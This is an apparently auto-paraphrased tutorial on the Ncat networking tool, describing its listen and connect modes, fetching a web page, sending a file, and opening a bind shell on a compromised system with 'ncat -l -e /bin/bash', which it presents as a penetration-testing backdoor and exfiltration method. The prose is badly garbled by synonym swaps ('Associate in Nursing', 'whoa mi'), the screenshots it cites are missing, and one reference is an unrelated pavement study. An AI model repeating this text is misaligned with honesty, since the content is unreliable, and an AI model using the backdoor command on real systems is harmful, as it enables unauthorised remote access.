For those that might not be acquainted, an exquisite network administration tool was unveiled in 1995; it had been referred to as Netcat. This had a spread of uses, from file transfers, to network observance, to talk servers—even therefore useful on produce a backdoor by mirroring its input to a given network address of the user’s alternative. Netcat was in many ways a awfully light-weight port scanner—by employing a fast shell script, it was extremely straightforward to test whether or not sure ports were responding on a given host.

Netcat remains in significant use these days, however the Nmap development team saw some pretty serious improvements both in stability and usability that they’ll create to the software. As such, in 2009, Ncat was discharged as an element of the Nmap suite.

Unlike Netcat, Ncat has SSL support (natively), nice affiliation redirection reliability {and several and several different and several other} other inbuilt options that create it a good tool in a very security administrator s tool case.

Ncat has 2 modes: the “listen” mode, that listens on a provided port for incoming connections, and also the “connect” mode, through that commands are sent, and feedback is received. within the connect mode, we will use Ncat to attach to a variety of services, together with HTTP-based internet servers.

Sending the GET / HTTP/1.0 request when invoking Ncat via ncat nmap.org 80 yields the subsequent output:

Although it clearly does not render in addition as an internet browser like Chrome or Firefox

would you’ll be able to see the HTTP/HTML response from the net server quite clearly?

This same practicality of Ncat may be wont to connect with many alternative varieties of services, together with SMTP, FTP, POP3, and so on. once trying to send completely different inputs to completely different protocols, Ncat may be invaluable!

Ncat is additionally terribly helpful once conducting a penetration take a look at or security assessment, as it may be used as each a way for information exfiltration, and as the simplest way to possess a persistent backdoor into a compromised system.

The ability to send a file through Ncat uses each the “listen” and “connect” functionalities of the tool. the subsequent screenshot shows a awfully basic Ncat command:

To begin, we tend to founded Associate in Nursing Ncat hearer victimisation the -l or listen flag. Since we tend to are expecting a file, we will pipe the output to received.txt. we tend to perpetually wish to form sure that we tend to are outputting the kind of file that we’re expecting so we do not have to handle dynamical file varieties at a later date. once putting in place the hearer, we can also founded a selected port (which is helpful on penetration tests); however during this case, we left the default port of 31337 intact.

We can see within the preceding screenshot that someplace else (not within the listener) we tend to have a file referred to as send.txt with the this is often the file that we tend to are visiting send content. causation the file is easy! All we want to try to to is invoke Ncat, point it at a localhost (again, we’re victimisation the default port of 31337 therefore no port specification is necessary), and pipe the input from send.txt. the subsequent screenshot demonstrates gap a received text file:

As we will see within the preceding screenshot, Ncat can mechanically shut out once the file is received. Once we tend to truly receive the file, it’s as straightforward as “cat”-in the file we tend to receive to determine that it’s after all the identical content because the one we tend to send. Lastly Ncat may be used as a backdoor, so as to make persistent access to a compromised system. the subsequent screenshot shows this basic functionality:

As seen within the preceding screenshot, establishing a shell affiliation via Ncat is very straightforward. we tend to used ncat -l -e /bin/bash to pay attention on the default, and dead bin/bash (our shell) once a shopper connected. It’s value noting that during this type, the backdoor isn’t persistent—meaning that it’ll not keep listening when the client has disconnected. the subsequent screenshot demonstrates the flexibility to run  Linux commands on a distant system through Ncat:

In order to attach to the shell, as shown within the preceding screenshot, we will merely invoke ncat localhost (since the port remains default) and have a bash shell spawn our prompt. during this case, we tend to run whoa mi and received back ds haw, then dead a ls command and received a directory listing of the remote directory. whereas different backdoor access ways is also a lot of reliable or difficult, it’s exhausting to suppose of one a lot of simple!

Conclusion:

Nmap may be a terribly powerful tool and it’s ability to hide the terribly initial aspects of penetration testing, that embody military operation and enumeration. this text was written in a shot to debate Nmap from the beginner level to the advanced level. There are such a big number of alternative things that you just will do with the Nmap, and that we can discuss them within the future articles.

References:

Bagyalakshmi, Rajkumar, Arunkumar, Easwaran, Narasimhan, Elamaran, . . . Ramirez-Gonzalez. (2018). Network Vulnerability Analysis on Brain Signal/Image Databases Using Nmap and Wireshark Tools. Access, IEEE, 6, 57144-57151.

Kalsi, T. (2017). Nmap: Network security scans. Linux Format, (219), 76-77.

Kaur, Gurline, & Kaur, Navjot. (2017). Penetration Testing – Reconnaissance with NMAP Tool. International Journal of Advanced Research in Computer Science, 8(3), International Journal of Advanced Research in Computer Science, Mar 2017, Vol.8(3).

Li, Hui, Kayhanian, Masoud, & Harvey, John T. (2013). Comparative field permeability measurement of permeable pavements using ASTM C1701 and NCAT permeameter methods. Journal of Environmental Management, 118, 144-152.

Rashid, F. (2015). Nmap 7 brings faster scanning and improved IPv6 support. InfoWorld.com, InfoWorld.com, Nov 23, 2015.

Shaw, D., & Safari, an O’Reilly Media Company. (2015). Nmap Essentials (1st ed., Community experience distilled).